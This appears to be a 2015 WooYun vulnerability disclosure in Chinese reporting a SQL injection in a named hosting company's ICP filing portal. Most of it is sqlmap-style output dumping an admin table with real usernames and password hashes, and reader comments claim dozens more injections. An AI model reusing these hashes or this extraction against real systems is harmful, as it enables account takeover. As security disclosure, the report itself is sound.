缺陷编号:WooYun-2015-0128887
漏洞标题:时代互联ICP备案中心SQL注入可泄漏大量域名密码信息
相关厂商:广东时代互联科技有限公司
漏洞作者:kris
提交时间:2015-07-24 10:58
公开时间:2015-07-29 11:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2015-07-24: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-29: 厂商已经主动忽略漏洞,细节向公众公开
时代互联ICP备案中心SQL注入可泄漏大量域名密码信息
ICP备案中心某查询页面POST注入...url : http://icp.now.cn:80/post.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 |
10:29:08] [INFO] the SQL query used returns 5 entries<br> [10:29:08] [INFO] retrieved: user_id<br> [10:29:08] [INFO] retrieved: smallint(5) unsigned<br> [10:29:08] [INFO] retrieved: user_name<br> [10:29:09] [INFO] retrieved: varchar(60)<br> [10:29:10] [INFO] retrieved: email<br> [10:29:11] [INFO] retrieved: varchar(60)<br> [10:29:11] [INFO] retrieved: password<br> [10:29:11] [INFO] retrieved: varchar(60)<br> [10:29:11] [INFO] retrieved: group_id<br> [10:29:11] [INFO] retrieved: int(11)<br> [10:29:11] [INFO] fetching entries of column(s) 'email, group_id, password, user_id, user_name' for table 'ba_admin_user' in database 'ICPQY'<br> [10:29:11] [INFO] the SQL query used returns 370 entries<br> [10:29:15] [INFO] retrieved: [email protected]<br> [10:29:15] [INFO] retrieved: 0<br> [10:29:15] [INFO] retrieved: 4e0a4a13f1762b27b19c8e68c6f4aba0<br> [10:29:15] [INFO] retrieved: 1<br> [10:29:16] [INFO] retrieved: admin<br> [10:29:16] [INFO] retrieved:<br> [10:29:16] [INFO] retrieved: 4<br> [10:29:16] [INFO] retrieved: *FD571203974BA9AFE270FE62151AE967ECA5E0AA<br> [10:29:19] [INFO] retrieved: 13<br> [10:29:19] [INFO] retrieved: lxlin<br> [10:29:19] [INFO] retrieved:<br> [10:29:19] [INFO] retrieved: 4<br> [10:29:19] [INFO] retrieved: *8BBF4106CB3918B2F82233E999FC5DE6967F2BE4<br> [10:29:20] [INFO] retrieved: 17<br> [10:29:20] [INFO] retrieved: lmw264<br> [10:29:20] [INFO] retrieved:<br> [10:29:20] [INFO] retrieved: 4<br> [10:29:20] [INFO] retrieved: *A57E009B0989A6C292D631A2746203C89AD6A622<br> [10:29:20] [INFO] retrieved: 22<br> [10:29:21] [INFO] retrieved: alice123<br> [10:29:21] [INFO] retrieved:<br> [10:29:21] [INFO] retrieved: 6<br> [10:29:21] [INFO] retrieved: *5674BFF6BC10AB7E9F26E4FA4B2F13ABB1489099<br> [10:29:21] [INFO] retrieved: 23<br> [10:29:21] [INFO] retrieved: liangjiahui<br> [10:29:22] [INFO] retrieved:<br> [10:29:22] [INFO] retrieved: 4<br> [10:29:22] [INFO] retrieved: *8A7456881D02FB060B1C70935B339E345F357E5C<br> [10:29:25] [INFO] retrieved: 24<br> [10:29:25] [INFO] retrieved: yhui<br> [10:29:25] [INFO] retrieved:<br> [10:29:25] [INFO] retrieved: 4<br> [10:29:25] [INFO] retrieved: *EA460F671BD6D754759024E4FBCCE3DFAA04AB1B<br> [10:29:26] [INFO] retrieved: 41<br> [10:29:26] [INFO] retrieved: zhangliping<br> [10:29:26] [INFO] retrieved:<br> [10:29:26] [INFO] retrieved: 4<br> [10:29:27] [INFO] retrieved: *6BB831B0F81F1F56EC9B834A1714053977185692<br> [10:29:27] [INFO] retrieved: 84<br> [10:29:30] [INFO] retrieved: cheukwu<br> [10:29:31] [INFO] retrieved:<br> [10:29:31] [INFO] retrieved: 4<br> [10:29:31] [INFO] retrieved: *FBF0116DB201C3473BBE2FD1245CD178D1C78EED<br> [10:29:31] [INFO] retrieved: 85<br> [10:29:31] [INFO] retrieved: zengbiao<br> [10:29:31] [INFO] retrieved:<br> [10:29:31] [INFO] retrieved: 6<br> [10:29:31] [INFO] retrieved: *F228B54C6D2BED807FB850D66D9350CDAA2916D1 |
我很单纯,不深入。。。
你们懂的!!!
危害等级:无影响厂商忽略
忽略时间:2015-07-2911:00
漏洞Rank:18 (WooYun评价)
暂无
这个企业是真不靠谱的
这个平台,连主站,还有一个分站,总共有50多个sql注入,拿不下shell,@疯狗
漏洞修补了么测试注入不存在了
原文连接
的情况下转载,若非则不得使用我方内容。